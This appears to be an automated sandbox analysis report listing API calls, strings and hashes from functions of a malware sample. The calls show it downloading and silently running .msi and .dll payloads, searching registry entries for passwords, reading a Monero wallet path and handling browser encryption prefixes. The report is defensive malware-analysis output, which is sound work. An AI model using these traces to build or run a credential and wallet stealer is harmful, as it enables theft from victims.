Opcode Fuzzy Hash: 840f21f0a925c32e4b07566fcffe5bafd3990858c8fb6f6448a55fd2581d4987
Instruction Fuzzy Hash: 555108B5A00209AFDB14DFA8DD89AEEB7B9FF48310F105419FA05E3250DB74AD45CBA1

Function 0082E3E7 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,00638B0C), ref: 0082E454
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0082E47E
lstrcpy.KERNEL32(00000000,?), ref: 0082E4B6
lstrcat.KERNEL32(?,00000000), ref: 0082E4C4
lstrcat.KERNEL32(?,?), ref: 0082E4DF
lstrcat.KERNEL32(?,?), ref: 0082E4F3
lstrcat.KERNEL32(?,00638A84), ref: 0082E507
lstrcat.KERNEL32(?,?), ref: 0082E51B
lstrcat.KERNEL32(?,00638AC8), ref: 0082E52E
lstrcpy.KERNEL32(00000000,?), ref: 0082E566
GetFileAttributesA.KERNEL32(00000000), ref: 0082E56D

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$AttributesFileFolderPath
String ID:
API String ID: 4230089145-0
Opcode ID: e19d0bf03348247b6e4e2eb8500c66dd98e7d1c051ca1e120ba3398100732841
Instruction ID: e4b78a8be67ee58eae4590a5529b046913760d424fe7ea11346fe67ed51459cf
Opcode Fuzzy Hash: e19d0bf03348247b6e4e2eb8500c66dd98e7d1c051ca1e120ba3398100732841
Instruction Fuzzy Hash: 71617DB590012CABCB58DB68DD44ADD77B9FF48300F1489A9B609E3250EB749FD58F90

Function 00816D37 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00816D66
InternetOpenA.WININET(0042CFF4,00000001,00000000,00000000,00000000), ref: 00816D93
StrCmpCA.SHLWAPI(?,00638C80), ref: 00816DB1
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00816DD1
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00816DEF
InternetReadFile.WININET(00000000,?,00000400,?), ref: 00816E08
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00816E2D
InternetReadFile.WININET(00000000,?,00000400,?), ref: 00816E57
CloseHandle.KERNEL32(00000000), ref: 00816E77
InternetCloseHandle.WININET(00000000), ref: 00816E7E
InternetCloseHandle.WININET(?), ref: 00816E88

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
String ID:
API String ID: 2500263513-0
Opcode ID: 643386e609635035052e560f5a6fff5dc180104d3ab902b738fcdb667d9cf2cd
Instruction ID: 20502470c8a113a134519afb463deb7ac3536f04f82ae69f40fc2afe3abb262c
Opcode Fuzzy Hash: 643386e609635035052e560f5a6fff5dc180104d3ab902b738fcdb667d9cf2cd
Instruction Fuzzy Hash: F6416CB5A40209ABDB20DB64DC85FEE77ADFF44701F104558FA05E7180EF70AE948BA4

Function 00406AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00406AFF
InternetOpenA.WININET(Function_0002CFF4,00000001,00000000,00000000,00000000), ref: 00406B2C
StrCmpCA.SHLWAPI(?,00912100), ref: 00406B4A
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00406B6A
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406B88
InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406BA1
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00406BC6
InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406BF0
CloseHandle.KERNEL32(00000000), ref: 00406C10
InternetCloseHandle.WININET(00000000), ref: 00406C17
InternetCloseHandle.WININET(?), ref: 00406C21

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
String ID:
API String ID: 2500263513-0
Opcode ID: 35ddb8c2a4a881806d562d2ef6e90a7f42638ce67044cd306e4b1ffa5f1d346c
Instruction ID: 28f6004d9fc435b827a3bc8f9bbe67469d36c8410753c23a53a3daf2e3da10f0
Opcode Fuzzy Hash: 35ddb8c2a4a881806d562d2ef6e90a7f42638ce67044cd306e4b1ffa5f1d346c
Instruction Fuzzy Hash: E64171B1600215ABDB24DF64DC89FAE77B9EB44704F004469FA06E72C0DF74AE448BA8

Function 00834C57 Relevance: 16.5, APIs: 11, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(0043517C,?,0082764B), ref: 00834C5D
GetProcAddress.KERNEL32(00000000,00435188), ref: 00834C73
GetProcAddress.KERNEL32(00000000,00435190), ref: 00834C84
GetProcAddress.KERNEL32(00000000,0043519C), ref: 00834C95
GetProcAddress.KERNEL32(00000000,004351A8), ref: 00834CA6
GetProcAddress.KERNEL32(00000000,004351B0), ref: 00834CB7
GetProcAddress.KERNEL32(00000000,004351BC), ref: 00834CC8
GetProcAddress.KERNEL32(00000000,004351C4), ref: 00834CD9
GetProcAddress.KERNEL32(00000000,004351CC), ref: 00834CEA
GetProcAddress.KERNEL32(00000000,004351DC), ref: 00834CFB
GetProcAddress.KERNEL32(00000000,004351E8), ref: 00834D0C

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 7c009115eff614aabd79fc5db8e1c27ef2ce098b719a4c71c1e5a7c52ab7418c
Instruction ID: 6c06c357cc81f38cb876656cb986f95283de142d53d73396399421f9ea981094
Opcode Fuzzy Hash: 7c009115eff614aabd79fc5db8e1c27ef2ce098b719a4c71c1e5a7c52ab7418c
Instruction Fuzzy Hash: 3D119675D52720AF8B149BA5AD0DB9A3ABABA0E70A714381BF551D3160DBF84400DFE4

Function 00407A60 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 109stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004077D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407805
Part of subcall function 004077D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040784A
Part of subcall function 004077D0: strlen.MSVCRT ref: 0040787E
Part of subcall function 004077D0: StrStrA.SHLWAPI(?,Password), ref: 004078B8
Part of subcall function 004077D0: strcpy_s.MSVCRT ref: 004078E1
Part of subcall function 004077D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004078EC
Part of subcall function 004077D0: HeapFree.KERNEL32(00000000), ref: 004078F3
Part of subcall function 004077D0: strlen.MSVCRT ref: 00407900

lstrcatA.KERNEL32(00000000,00434ADC), ref: 00407A90
lstrcatA.KERNEL32(00000000,?), ref: 00407ABD
lstrcatA.KERNEL32(00000000, : ), ref: 00407ACF
lstrcatA.KERNEL32(00000000,?), ref: 00407AF0
wsprintfA.USER32 ref: 00407B10
lstrcpy.KERNEL32(00000000,?), ref: 00407B39
lstrcatA.KERNEL32(00000000,00000000), ref: 00407B47
lstrcatA.KERNEL32(00000000,00434ADC), ref: 00407B60

Strings

: , xrefs: 00407AC9

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcat$Heapstrlen$EnumFreeOpenProcessValuelstrcpystrcpy_swsprintf
String ID: :
API String ID: 2460923012-3653984579
Opcode ID: 85c3bb5b6b49f511d0860545871b2ac6265c09c377d70ae0115a0fec641de96f
Instruction ID: e84d9cfcc29a26c52425093129385012f453173fe785cac49ef106dd3e8f94e1
Opcode Fuzzy Hash: 85c3bb5b6b49f511d0860545871b2ac6265c09c377d70ae0115a0fec641de96f
Instruction Fuzzy Hash: FD319572E04214AFCB14EBA4DC449ABB77AEB88704F14552EF605A3390DB78F941CBA5

Function 0081BE60 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0081BE86
lstrlen.KERNEL32(00000000), ref: 0081BEB9
lstrcpy.KERNEL32(00000000,00000000), ref: 0081BEE3
lstrcat.KERNEL32(00000000,00000000), ref: 0081BEEB
lstrcpy.KERNEL32(00000000,00000000), ref: 0081BF13
lstrlen.KERNEL32(00434ADC), ref: 0081BF8A

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 8783f025f7d8f793a09bf476b3931c136a61ddc7f50b417c02b46b450a9afe73
Instruction ID: b8f0db55434caf3ed1d05215e69ce4ea277883a55217d72decb35c88442cb531
Opcode Fuzzy Hash: 8783f025f7d8f793a09bf476b3931c136a61ddc7f50b417c02b46b450a9afe73
Instruction Fuzzy Hash: 9BA12974A012058FCB24EF68D949AEDB7B9FF48304F188069E409DB261DB35DC96CF91

Function 0082CAC5 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 127stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00837787: lstrlen.KERNEL32(------,00815E52), ref: 00837792
Part of subcall function 00837787: lstrcpy.KERNEL32(00000000), ref: 008377B6
Part of subcall function 00837787: lstrcat.KERNEL32(?,------), ref: 008377C0

Part of subcall function 008376F7: lstrcpy.KERNEL32(00000000), ref: 00837725

lstrcpy.KERNEL32(00000000,?), ref: 0082CB0C
lstrcpy.KERNEL32(00000000,?), ref: 0082CB35
ShellExecuteEx.SHELL32(0000003C), ref: 0082CC28

Strings

hKC, xrefs: 0082CB8C
<, xrefs: 0082CBE8
/passive, xrefs: 0082CBB0
.msi, xrefs: 0082CAC5
/i ", xrefs: 0082CB43

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteShelllstrcatlstrlen
String ID: /i "$ /passive$.msi$<$hKC
API String ID: 619169029-1752286046
Opcode ID: d2b116751ce216fb2286a9e68a66202bea7775a4c5eb314f18bb89a59e33ee94
Instruction ID: 8b387de501e633d73b09790c288b8473b475e0427b41814577ccf9b82b99229e
Opcode Fuzzy Hash: d2b116751ce216fb2286a9e68a66202bea7775a4c5eb314f18bb89a59e33ee94
Instruction Fuzzy Hash: DD415CB1D0025A8BCB24EF6CD8829DCB7B5FF44314F518468E509E7211EA34ED96CBC1

Function 00418020 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 118stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00418044
lstrlenA.KERNEL32(00000000), ref: 00418071
lstrcpy.KERNEL32(00000000,00000000), ref: 004180A0
strtok_s.MSVCRT ref: 004180B1
StrCmpCA.SHLWAPI(00000000,00434C44), ref: 004180E5
StrCmpCA.SHLWAPI(00000000,00434C44), ref: 00418113
StrCmpCA.SHLWAPI(00000000,00434C44), ref: 00418147

Strings

FB, xrefs: 00418031, 0041803B

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID: FB
API String ID: 348468850-3916161110
Opcode ID: 34223f7f78c5636e97223aade976c1506bfe9535c33a70f572279a11dd1b5945
Instruction ID: 404eea85ac803e185aee75a90389890c071ad2b647f6dd4514bd3fc7a5dfdf25
Opcode Fuzzy Hash: 34223f7f78c5636e97223aade976c1506bfe9535c33a70f572279a11dd1b5945
Instruction Fuzzy Hash: 3041527060011ADFCB21DF58D884ADA7BF4FF59300B12415EE809D7350DB75AA9ACF95

Function 008396E4 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 008396F0

Part of subcall function 00838C76: __getptd_noexit.LIBCMT ref: 00838C79
Part of subcall function 00838C76: __amsg_exit.LIBCMT ref: 00838C86

__amsg_exit.LIBCMT ref: 00839710
__lock.LIBCMT ref: 00839720
InterlockedDecrement.KERNEL32(?), ref: 0083973D
free.MSVCRT ref: 00839750
InterlockedIncrement.KERNEL32(XuC), ref: 00839768

Strings

XuC, xrefs: 00839747
XuC, xrefs: 00839756, 0083975E, 00839767

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
String ID: XuC$XuC
API String ID: 634100517-965221565
Opcode ID: 020f135a77a2bf4c8e551a451e6f34798df094e9785368ae935b27bc8f0fed19
Instruction ID: 26dfc6b0ccbd6ed2f3c23dfd67e7bcd59e3eeb4859b61e54358be26dd0bba01a
Opcode Fuzzy Hash: 020f135a77a2bf4c8e551a451e6f34798df094e9785368ae935b27bc8f0fed19
Instruction Fuzzy Hash: 1C01EDB1915B11ABD731BF28880575D7360FF84B10F040115E890E32C0DB68A942CBDA

Function 00409DE0 Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 182memorystringCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT(?,v20,00000003), ref: 00409E04
memcmp.MSVCRT(?,v10,00000003), ref: 00409E42
memset.MSVCRT ref: 00409E6F
LocalAlloc.KERNEL32(00000040), ref: 00409EA7

Part of subcall function 004273F0: lstrcpy.KERNEL32(00000000,ERROR), ref: 0042740E

lstrcpy.KERNEL32(00000000,00431C78), ref: 00409FB2

Strings

v20, xrefs: 00409DFE
v10, xrefs: 00409E3C
@, xrefs: 00409E88

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpymemcmp$AllocLocalmemset
String ID: @$v10$v20
API String ID: 3420379846-278772428
Opcode ID: bc4f434b4eee7a59bb6f6508d4fb4d2c58b91057a418100ef99a65c240b8e728
Instruction ID: 57b104a805a855c555bf5cef3961ecd8b1981a4a75d50b3cd93f7f7127efc8e6
Opcode Fuzzy Hash: bc4f434b4eee7a59bb6f6508d4fb4d2c58b91057a418100ef99a65c240b8e728
Instruction Fuzzy Hash: DD51AE31B102059BDB10EF69DC45B9E77A4AF50318F15503AF909FB2D2DBB8ED058B98

Function 0082E490 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0082E4B6
lstrcat.KERNEL32(?,00000000), ref: 0082E4C4
lstrcat.KERNEL32(?,?), ref: 0082E4DF
lstrcat.KERNEL32(?,?), ref: 0082E4F3
lstrcat.KERNEL32(?,00638A84), ref: 0082E507
lstrcat.KERNEL32(?,?), ref: 0082E51B
lstrcat.KERNEL32(?,00638AC8), ref: 0082E52E
lstrcpy.KERNEL32(00000000,?), ref: 0082E566
GetFileAttributesA.KERNEL32(00000000), ref: 0082E56D

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$AttributesFile
String ID:
API String ID: 3428472996-0
Opcode ID: 50497141c4dc9b5dfcf57323228a0a017200a2c71b7d8417b3d616d678081977
Instruction ID: 39faf3bb8943beedd7958c74f26fd2c0b312e79780909a7ed2c9444d1e68ade4
Opcode Fuzzy Hash: 50497141c4dc9b5dfcf57323228a0a017200a2c71b7d8417b3d616d678081977
Instruction Fuzzy Hash: 90418EB59001289BCB18EB68DC44ADD77B9FF48304F0489A8B609D3250EB749FD98FE1

Function 0082C732 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 145stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00837787: lstrlen.KERNEL32(------,00815E52), ref: 00837792
Part of subcall function 00837787: lstrcpy.KERNEL32(00000000), ref: 008377B6
Part of subcall function 00837787: lstrcat.KERNEL32(?,------), ref: 008377C0

Part of subcall function 008376F7: lstrcpy.KERNEL32(00000000), ref: 00837725

Part of subcall function 00837737: lstrcpy.KERNEL32(00000000), ref: 00837766
Part of subcall function 00837737: lstrcat.KERNEL32(00000000), ref: 00837772

lstrcpy.KERNEL32(00000000,?), ref: 0082C826
lstrcpy.KERNEL32(00000000,?), ref: 0082C84F
ShellExecuteEx.SHELL32(0000003C), ref: 0082C8BB

Strings

"" , xrefs: 0082C77C
hKC, xrefs: 0082C7A0
hKC, xrefs: 0082C7E0
<, xrefs: 0082C86F

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: "" $<$hKC$hKC
API String ID: 3031569214-169242861
Opcode ID: fffe8a7609f357f4b1991bf1604a31f5368c21b077dcecb409a6e258a18fd738
Instruction ID: dab61a8e3e5babf306980d97a321b915b0b75eda0d3bb5eede90a2662973819d
Opcode Fuzzy Hash: fffe8a7609f357f4b1991bf1604a31f5368c21b077dcecb409a6e258a18fd738
Instruction Fuzzy Hash: D4516CB1D002A98BCB24EFBCD88299CB7B5FF54304F218479E505E7611EA34AD96CBC1

Function 0082C8EC Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 136stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00837787: lstrlen.KERNEL32(------,00815E52), ref: 00837792
Part of subcall function 00837787: lstrcpy.KERNEL32(00000000), ref: 008377B6
Part of subcall function 00837787: lstrcat.KERNEL32(?,------), ref: 008377C0

Part of subcall function 008376F7: lstrcpy.KERNEL32(00000000), ref: 00837725

Part of subcall function 00837737: lstrcpy.KERNEL32(00000000), ref: 00837766
Part of subcall function 00837737: lstrcat.KERNEL32(00000000), ref: 00837772

lstrcpy.KERNEL32(00000000,?), ref: 0082C9E2
lstrcpy.KERNEL32(00000000,?), ref: 0082CA0B
ShellExecuteEx.SHELL32(0000003C), ref: 0082CA6B

Strings

<, xrefs: 0082CA2B
TLC, xrefs: 0082C97A
hKC, xrefs: 0082C956
.dll, xrefs: 0082C8EC

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: .dll$<$TLC$hKC
API String ID: 3031569214-3095936222
Opcode ID: d6d9000b4ffd34381ef64f47ec47fa7362f59ea47946d6612dca6a059b91e08a
Instruction ID: 78219e4609c24240c063177780063619ae370eca2433fae5a60fd5f16a597f47
Opcode Fuzzy Hash: d6d9000b4ffd34381ef64f47ec47fa7362f59ea47946d6612dca6a059b91e08a
Instruction Fuzzy Hash: 1C5160B19002A98BCB24EFACDC825DC77B5FF54304F518479E505E7211EA349D9ACBC1

Function 00832B77 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00832BB2
GetVolumeInformationA.KERNEL32(?,00000000,00000000,0082976D,00000000,00000000,00000000,00000000), ref: 00832BE3
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00832C46
RtlAllocateHeap.NTDLL(00000000), ref: 00832C4D
wsprintfA.USER32 ref: 00832C72

Strings

:\, xrefs: 00832BCC
C, xrefs: 00832BBC

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
String ID: :\$C
API String ID: 2572753744-3309953409
Opcode ID: 013d7a5abd80eb44982cec66597c927420344f608520c3a884e76de014233dcd
Instruction ID: 44dec3505ba78f2ec3c28641a0f4339bbe973e12fd4e392e7108f2cca59f1903
Opcode Fuzzy Hash: 013d7a5abd80eb44982cec66597c927420344f608520c3a884e76de014233dcd
Instruction Fuzzy Hash: 63318FB1D082099FCB14CFA88985AEEFFBCFB58350F10516AE505E7650E2348B408BF1

Function 00401120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401135
HeapAlloc.KERNEL32(00000000), ref: 0040113C
RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401159
RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401173
RegCloseKey.ADVAPI32(?), ref: 0040117D

Strings

SOFTWARE\monero-project\monero-core, xrefs: 0040114F
wallet_path, xrefs: 0040116D

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: SOFTWARE\monero-project\monero-core$wallet_path
API String ID: 3466090806-4244082812
Opcode ID: 3eabf35694fb7367b255f32a536ab17974b5ca8c4e5d7cae6c54b1374e0763a8
Instruction ID: 429a39cc595111bc57384dbb44951e00fba51e8d3c52ba565137f0064186628b
Opcode Fuzzy Hash: 3eabf35694fb7367b255f32a536ab17974b5ca8c4e5d7cae6c54b1374e0763a8
Instruction Fuzzy Hash: D7F06D75A40308BFD7049BA09C89FEB7B7DEB04755F100059FE05E2290D6B05A448BE0

Function 00819327 Relevance: 12.2, APIs: 8, Instructions: 161networkfilestringCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(0042CFF4,00000001,00000000,00000000,00000000), ref: 00819346
InternetOpenUrlA.WININET(00000000,00434B2C,00000000,00000000,80000000,00000000), ref: 00819363
InternetCloseHandle.WININET(00000000), ref: 00819370

Part of subcall function 008281D7: memchr.MSVCRT ref: 00828216
Part of subcall function 008281D7: memcmp.MSVCRT(00000000,?,?,?,00434B48,00000000), ref: 00828230
Part of subcall function 008281D7: memchr.MSVCRT ref: 0082824F

Part of subcall function 00818BE7: std::_Xinvalid_argument.LIBCPMT ref: 00818BFD

strlen.MSVCRT ref: 0081938C
InternetReadFile.WININET(?,?,?,00000000), ref: 008193CD
InternetReadFile.WININET(00000000,?,00001000,?), ref: 008193FE
InternetCloseHandle.WININET(00000000), ref: 00819409
InternetCloseHandle.WININET(00000000), ref: 00819410

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$FileOpenReadmemchr$Xinvalid_argumentmemcmpstd::_strlen
String ID:
API String ID: 1093921401-0
Opcode ID: ec4cbb5dbbd37489c1cf68316e3847bbf2b1f5292038445eee392468e9e8c8fb
Instruction ID: 5419a2801353d9a89f2240be3c9f9f7ff8c7cd3268da0fcd15abe370851acf0c
Opcode Fuzzy Hash: ec4cbb5dbbd37489c1cf68316e3847bbf2b1f5292038445eee392468e9e8c8fb
Instruction Fuzzy Hash: 8251B6716002059BDB20DBA8DC45BEEFBF9EF48710F14046AF945E32C0DBB4A98587A6

Function 00405640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040565A
HeapAlloc.KERNEL32(00000000), ref: 00405661
InternetOpenA.WININET(Function_0002CFF4,00000000,00000000,00000000,00000000), ref: 00405677
InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00405692
InternetReadFile.WININET(?,?,00000400,00000001), ref: 004056BC
memcpy.MSVCRT(00000000,?,00000001), ref: 004056E1
InternetCloseHandle.WININET(?), ref: 004056FA
InternetCloseHandle.WININET(00000000), ref: 00405701

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
String ID:
API String ID: 3894370878-0
Opcode ID: 39bfd9abbbfd464b144cda71feed78c781dd4d2607ed895f946f54a5c8bb3dbb
Instruction ID: 71c2a2d1e8b1bff0245bb1ace4ede4100b9513cc3bd865d9341d2d7473e0af64
